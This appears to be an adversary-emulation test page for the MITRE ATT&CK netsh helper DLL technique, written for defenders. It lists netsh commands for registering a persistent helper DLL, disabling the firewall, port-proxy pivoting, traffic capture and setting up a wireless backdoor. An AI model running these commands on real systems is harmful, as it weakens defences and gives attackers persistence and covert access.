caseysmithrc
54 lines
1.6 KiB
Markdown
54 lines
1.6 KiB
Markdown
# Netsh Helper DLL
|
|
|
|
MITRE ATT&CK Technique: [T1128](https://attack.mitre.org/wiki/Technique/T1128)
|
|
|
|
## A DLL can be registered to be loaded each time netsh.exe is executed, or for certain events.
|
|
|
|
Netsh interacts with other operating system components using dynamic-link library (DLL) files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to a networking component. For example, Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP servers.
|
|
|
|
## Attackers can register a netsh helper with this command
|
|
|
|
netsh.exe add helper C:\Path\file.dll
|
|
|
|
## The following registry key stores the paths to the helpers
|
|
|
|
HKLM\SOFTWARE\Microsoft\Netsh
|
|
|
|
## Additional Netsh.exe testing we recommend
|
|
|
|
### Firewall Control
|
|
|
|
Input:
|
|
|
|
netsh firewall set opmode [disable|enable]
|
|
|
|
### Netsh.exe Pivoting
|
|
|
|
Input:
|
|
|
|
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
|
|
|
Can also support v4tov6, v6tov6, and v6tov4
|
|
|
|
### Netsh.exe Sniffing
|
|
|
|
Input:
|
|
|
|
netsh trace start capture=yes overwrite=no tracefile=<FilePath.etl>
|
|
|
|
to stop:
|
|
|
|
netsh trace stop
|
|
|
|
### Netsh.exe Wireless backdoor
|
|
|
|
Input:
|
|
|
|
netsh wlan set hostednetwork mode=[allow\|disallow]
|
|
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
|
|
netsh wlan [start|stop] hostednetwork
|
|
|
|
Enables or disables hostednetwork service.
|
|
Complete hosted network setup for creating a wireless backdoor.
|
|
Starts or stops a wireless backdoor. See below to set it up.
|